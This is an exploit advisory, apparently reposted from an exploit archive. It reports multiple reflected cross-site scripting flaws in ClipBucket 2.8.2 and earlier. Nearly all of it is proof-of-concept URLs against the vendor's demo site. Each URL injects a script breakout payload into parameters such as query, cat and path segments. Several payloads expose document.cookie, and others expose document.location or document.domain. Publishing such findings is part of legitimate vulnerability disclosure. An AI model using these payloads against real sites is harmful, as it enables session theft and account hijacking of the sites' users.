ClipBucket 2.8.2 Cross Site Scripting

# Exploit Title: ClipBucket <= Multiple Cross-Site Scripting Vulnerabilities
# Google Dork: n/a
# Date: March 20 2017
# Exploit Author: NoGe
# Vendor Homepage: https://clipbucket.com/
# Download: https://github.com/arslancb/clipbucket/archive/4476.zip
# Version: 2.8.2, 2.8.1 and below
# Tested on: Kali Linux

# Proof of Concept (Demo Site)

       https://demo.clipbucket.com/signup.php?mode=login
</script>"><script>prompt(document.cookie)</script>

       https://demo.clipbucket.com
/search_result.php?query=NoGe&type=videos</script>"><script>prompt(document.location)</script>

       https://demo.clipbucket.com
/collections.php?cat=all</script>"><script>prompt(document.domain)</script>&sort=view_all&time=all_time&page=1&seo_cat_name=All&sorting=sort

       https://demo.clipbucket.com
/collections.php?cat=all&sort=view_all&time=all_time&page=1&seo_cat_name=All</script>"><script>prompt(document.cookie)</script>&sorting=sort

       https://demo.clipbucket.com
/photos.php?cat=all</script>"><script>prompt(document.location)</script>&sort=view_all&time=all_time&page=1&seo_cat_name=All&sorting=sort

       https://demo.clipbucket.com
/photos.php?cat=all&sort=view_all&time=all_time&page=1&seo_cat_name=All</script>"><script>prompt(document.domain)</script>&sorting=sort

       https://demo.clipbucket.com
/channels/all/All/view_all</script>"><script>prompt(document.cookie)</script>/all_time/1&sorting=sort/

       https://demo.clipbucket.com
/collections/all/All/most_recent</script>"><script>prompt(document.domain)</script>/all_time/1&timing=time/



Regards.
-- 
NoGe

Copyright ©2024 Exploitalert.